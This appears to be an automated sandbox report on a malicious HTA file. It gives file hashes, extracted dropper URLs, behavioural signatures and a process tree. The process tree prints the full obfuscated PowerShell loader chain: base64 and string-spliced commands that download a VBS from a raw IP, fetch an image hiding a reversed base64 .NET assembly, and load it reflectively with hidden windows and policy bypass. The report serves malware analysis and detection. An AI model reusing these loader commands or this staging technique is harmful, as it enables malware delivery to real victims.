Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 07:27

General

  • Target

    mitradesignworkgoodforeveryoneforgiftedmbestthings.hta

  • Size

    207KB

  • MD5

    6e8e497a9ab2be601520a182073419f1

  • SHA1

    1f66efaeed5492931779fa941b1a67967f9c0ee2

  • SHA256

    faae949a7d2f32b0ae09b23d53d602dac380db26541952755c920773e46f8bcd

  • SHA512

    73b1035d2975aea8dc579a307fce7f2c15b1a240063dbfdb5b13e01571a5f188c25dc6f8ad9ed300e87c760ce1a2f0e6098f1cfb199ae03e28e9476766466895

  • SSDEEP

    96:43F97KoUXZbhIoUXZzhoZx79f+hs6oByayqoUXZSoUXZ4hMoUXZrQ:43F1NaZRaZKT9+7CyaytaZVaZ8aZrQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mitradesignworkgoodforeveryoneforgiftedmbestthings.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
      "C:\Windows\sYSTEm32\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe" "pOWErSHELl.eXE -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe ; IeX($(IeX('[sysTem.tEXT.ENCODInG]'+[CHAR]58+[ChaR]58+'Utf8.gETsTriNg([SYSteM.cOnvERt]'+[chaR]0X3A+[chAr]58+'FROMBaSe64STRing('+[ChAr]0X22+'JDNjTHBiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRlRmlOSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhOa0lIQ0FhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFBZk52LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sY2l1LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUm96bGRXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6Sik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhDWVBaQWZ5U3giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ6UmpHTW94ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzY0xwYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4yMy4yMTIuMjMzLzMzMS9zZWV0aGViZXN0dGhpbmdzb2ZnaXJsc3NoZWlzYW1vbnRoZXJmdWNrZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMiLDAsMCk7U1RhclQtc0xlZXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMi'+[ChaR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bq6pbmqk.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA95A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA959.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2844
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdiVnBpbWFnZVVybCA9IE1SQmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jJysnb20vYXBpL2ZpbGUvZycrJ2V0PycrJ2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEsnKydqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGInKydiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgTVJCO2JWcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7YlZwaW1hZ2VCeXRlcyA9IGJWcHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEoYlZwaW1hZ2VVcmwpO2JWcGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGJWcGltYWdlQnl0ZXMpO2JWcHMnKyd0YXJ0RmxhZyA9IE1SQjw8QkFTRTY0X1NUQVJUPj5NUkI7YlZwZW5kRmxhZyA9IE1SQjw8QkFTRTY0X0VORD4+TVJCO2JWcHN0YXJ0SW5kZXggPSBiVnBpbWFnZVRleHQuSW5kZXhPZihiVnBzdGFydEZsYWcpO2JWcGVuZEluZGV4ID0gYlZwaW1hZ2VUZXh0LkluZGV4T2YoYlZwZW5kRmxhZyk7YlZwc3RhcnRJbmRlJysneCAtZ2UgMCAtYW5kICcrJ2JWcGVuZEluZGV4IC1ndCBiJysnVnBzdGFydEluZGV4O2JWcHN0YXJ0SW5kJysnZXggKz0gYlZwc3RhcnRGbGFnLkxlbmd0aDtiVnBiYXMnKydlNjRMZW5ndGggPSBiVicrJ3BlbmRJbmRleCAtIGJWcHN0YXJ0SW5kZXg7YlZwYmFzZTY0Q29tbWFuZCA9IGJWJysncGknKydtYWcnKydlVGV4dC5TdWJzdHJpbmcoYlZwc3RhcnRJbmRlJysneCcrJywgYlZwYmFzZTY0TGVuZ3QnKydoKTtiVnBiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChiVnBiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdkdRIEZvckVhY2gtT2JqZWN0IHsgYlZwJysnXyB9KVstMS4uLShiVnBiYXNlNjRDb21tYW5kJysnLkxlbmd0aCcrJyldO2JWcGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyJysnb21CYXNlNjRTdHJpbmcoYlZwYmFzZTY0UmV2ZScrJ3InKydzZScrJ2QpO2JWcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChiVnBjbycrJ21tYW4nKydkQnl0ZXMpO2JWcHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoTVJCVkFJTVJCKTtiVnB2YWlNZXRob2QuSW52b2tlKGJWcG51bGwsIEAoTVJCdHh0LlJSRlRSVy8xMzMvMzMyLjIxMi4zMi44OTEnKycvLzpwdHRoTVJCLCBNUkJkZScrJ3NhdGl2YWRvTVJCLCBNUkJkZXNhdGl2YWRvTVJCLCBNUkJkZXNhdGknKyd2YWRvTVJCLCBNUkJDYXNQb2xNUkIsIE1SQmRlJysnc2F0aXZhZG9NUkInKycsIE1SQmRlc2F0aXZhZG9NUkIsTVJCZGVzYXRpdmFkb01SQixNUkInKydkZXNhdGl2YWRvTVJCLE1SQmRlc2F0aXZhZG9NUkIsTScrJ1JCZGVzYXRpdmFkb01SQixNUkJkZXNhJysndCcrJ2l2YWRvTVJCLE1SQjFNUkIsTVJCJysnZGVzYXRpdmFkb01SQikpOycpLlJFcExhQ2UoKFtjSEFyXTk4K1tjSEFyXTg2K1tjSEFyXTExMiksW1N0cklOR11bY0hBcl0zNikuUkVwTGFDZSgndkdRJyxbU3RySU5HXVtjSEFyXTEyNCkuUkVwTGFDZSgnTVJCJyxbU3RySU5HXVtjSEFyXTM5KXwmKCAkU2hFTGxJZFsxXSskc0hlTGxJRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2324
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bVpimageUrl = MRBhttps://1017.filemail.c'+'om/api/file/g'+'et?'+'filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTK'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614b'+'b209c62c1730945176a0904f MRB;bVpwebClient = New-Object System.Net.WebClient;bVpimageBytes = bVpwebClient.'+'DownloadData(bVpimageUrl);bVpimageText = [System.Text.Encoding]::UTF8.GetString(bVpimageBytes);bVps'+'tartFlag = MRB<<BASE64_START>>MRB;bVpendFlag = MRB<<BASE64_END>>MRB;bVpstartIndex = bVpimageText.IndexOf(bVpstartFlag);bVpendIndex = bVpimageText.IndexOf(bVpendFlag);bVpstartInde'+'x -ge 0 -and '+'bVpendIndex -gt b'+'VpstartIndex;bVpstartInd'+'ex += bVpstartFlag.Length;bVpbas'+'e64Length = bV'+'pendIndex - bVpstartIndex;bVpbase64Command = bV'+'pi'+'mag'+'eText.Substring(bVpstartInde'+'x'+', bVpbase64Lengt'+'h);bVpbase64Reversed = -join (bVpbase64Command.ToCharArray'+'() vGQ ForEach-Object { bVp'+'_ })[-1..-(bVpbase64Command'+'.Length'+')];bVpcommandBytes = [System.Convert]::Fr'+'omBase64String(bVpbase64Reve'+'r'+'se'+'d);bVploadedAssembly = [System.Reflection.Assembly]::Load(bVpco'+'mman'+'dBytes);bVpvaiMethod = [dnlib.IO.Home].GetMethod(MRBVAIMRB);bVpvaiMethod.Invoke(bVpnull, @(MRBtxt.RRFTRW/133/332.212.32.891'+'//:ptthMRB, MRBde'+'sativadoMRB, MRBdesativadoMRB, MRBdesati'+'vadoMRB, MRBCasPolMRB, MRBde'+'sativadoMRB'+', MRBdesativadoMRB,MRBdesativadoMRB,MRB'+'desativadoMRB,MRBdesativadoMRB,M'+'RBdesativadoMRB,MRBdesa'+'t'+'ivadoMRB,MRB1MRB,MRB'+'desativadoMRB));').REpLaCe(([cHAr]98+[cHAr]86+[cHAr]112),[StrING][cHAr]36).REpLaCe('vGQ',[StrING][cHAr]124).REpLaCe('MRB',[StrING][cHAr]39)|&( $ShELlId[1]+$sHeLlID[13]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1484

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESA95A.tmp

    Filesize

    1KB

    MD5

    9bdc1d81f7338437e7b5fa543a0d9541

    SHA1

    33f8f748182e71c2a8de4501c5d237b0f4c288ea

    SHA256

    aa9ce0d2cf2d0f4ac02b6c45f40789cb663e209139deea2f8918b0b18442767a

    SHA512

    eabe05ac235015b1d3672de7800ecc81edda045c778ff0337d2e659f8c5a228031ad652d9cecb4f59a6282b84d04815605063f4d27e8ee1d7b383a90cd73349d

  • C:\Users\Admin\AppData\Local\Temp\bq6pbmqk.dll

    Filesize

    3KB

    MD5

    6d2bd5ea8e3b275d6c2bb3d75be29cdc

    SHA1

    65d4ac3f101046e494464df258a1462eae2a0167

    SHA256

    e31de400d7b69f60da7b64896775118ffedc43ae1b9f31473382f70aa4edc422

    SHA512

    9b99020773d6ba66f629f6086cd75696edb43bcfbb03097fd1b4cc8e3c394836f90288ae8bede5bcd754a5548cb7b06df2ce0374afcb31c74dcfa2a8fdb101a4

  • C:\Users\Admin\AppData\Local\Temp\bq6pbmqk.pdb

    Filesize

    7KB

    MD5

    68cdc6400b28ca73553429adfada47b6

    SHA1

    bfd0467ce64bbd41aca0f0f60b98932940105b65

    SHA256

    02589374ea7aaae02454b3eba843b14c85ba2f7047f7238393acf2026a3a37a7

    SHA512

    8357203e539fcb78c12da3dbc8a51c7f1a7eb31d4e051fb3e19da929874da491f204ade46804700e68f124b149a13fabc105a6eed4491c6e8e533c441cfd6ac2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    704664069ab1e548bd1a4008c97cbbbf

    SHA1

    d1c55f1b2ead80a55f6bf8ebca6818e39bffdd87

    SHA256

    8d77ac5238914dc181653981d129ebb34b0bbf51832384d13e74dd3de2e77209

    SHA512

    b19606e5401a293255e78a2219e8381dbb76b81950fa74d57f9b9755254cb102b9f4f5e1134df01225979dc19455de5fdc6aabf2c7dccb0b68bcfa39300a0ece

  • C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS

    Filesize

    138KB

    MD5

    a859403a72c197e1753a1519aac692e3

    SHA1

    7fbfdbb1384879f2ce069c72e4ce7b437bac8c0c

    SHA256

    4b3e15d8f27431ef7ba26051739774ac4ab9d5584b28bff4489cf503d434f38c

    SHA512

    9063f5760623203dd494a335040a57c3ab9a41193344f872739e0e55b43fccbb81033c528dd007952198ce089ab3dd8c9ef3b0d2b9eaba628a05b960def11ee9

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCA959.tmp

    Filesize

    652B

    MD5

    17c09d92cac200b380e2a97dbfd7438c

    SHA1

    197d6bf9107d2a1580ed0bdb1f69b1c883191c44

    SHA256

    81d78e3326d7fffbacfc722e52fcfea9bfb4ff87f9db58fd6fbe729ec31dd2c2

    SHA512

    a362d02ea30aa653b8f814ddb4f6ede9590eb03b80aae06539d9a0a86dd7cde3e33e5a5c7a3c872603340df3fbee99d38333fe7d1147432b644588c5a4d167e0

  • \??\c:\Users\Admin\AppData\Local\Temp\bq6pbmqk.0.cs

    Filesize

    483B

    MD5

    381b1194ec5fc354bf3696ed51323c18

    SHA1

    7d58fdbfdaa987d85d72478f3d225686b2d8dabe

    SHA256

    4acc1cdda62e68a822d5fd6dc065d75cb465390d1f4be7d046f811437a784455

    SHA512

    7f434aaf3b20b7bdf694e5e14c7bd60fe4470b8ea73742ea969b282d27d4b6c18101229aef7b547774beb44f4d8c21769a11e4b3a5a833c773fea7fbe5e4a750

  • \??\c:\Users\Admin\AppData\Local\Temp\bq6pbmqk.cmdline

    Filesize

    309B

    MD5

    77471e53642aa8661c8213fff3b3aad3

    SHA1

    e7ae3ee0065b7a9221ef77f573b617d10f4b7995

    SHA256

    f53f5c46b8b28301cad6dec7652c288b543c3e052a60e396514eac8ecc9a0aa3

    SHA512

    1a3019c2a0ac2f43b879adaaec2ef65a10ead9604e4bf6edbd8efa0585c4cc3ba5c69cdd2bf92359d5eb2e59837ee4b41a209ebc5d1d6b14d744b31edb5a20e1